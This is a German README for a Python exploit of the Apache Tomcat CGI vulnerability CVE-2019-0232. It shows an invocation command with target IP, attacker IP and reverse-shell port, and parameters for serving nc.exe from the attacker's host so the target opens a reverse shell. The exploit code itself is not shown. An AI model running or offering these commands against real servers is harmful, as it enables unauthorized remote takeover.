
Python-Exploit für CVE-2019-0232, das Apache-Tomcat-CGI-Schwachstellen angreift, mit automatisierter Reverse-Shell-Verbindung und anpassbaren Ziel-/Angreiferparametern.
Ein Python-Skript, das entwickelt wurde, um CGI-Schwachstellen auf Apache-Tomcat-Servern auszunutzen, indem eine Reverse-Shell-Verbindung hergestellt wird.

requestsgit clone <url-des-repositorys>
cd <repository-verzeichnis>
pip install requests
python3 tomcat_cgi_exploit.py -t <ZIEL-IP> -i <ANGREIFER-IP> -ncp <REVERSE-SHELL-PORT>
-t, --target: IP-Adresse des Ziels mit Apache Tomcat-i, --ip: IP-Adresse des Angreifers, der nc.exe hostet-ncp, --nc-port: Port für die Reverse-Shell-Verbindung-p, --port: Port des Ziels (Standard: 8080)-sp, --server-port: Serverport zum Hosten von nc.exe (Standard: 80)-cgi, --cgi-script: Name des auszunutzen CGI-Skripts (Standard: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Der Autor und die Mitwirkenden sind nicht verantwortlich für irgendeine missbräuchliche Verwendung oder Schäden, die durch dieses Skript verursacht werden. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie ein System testen.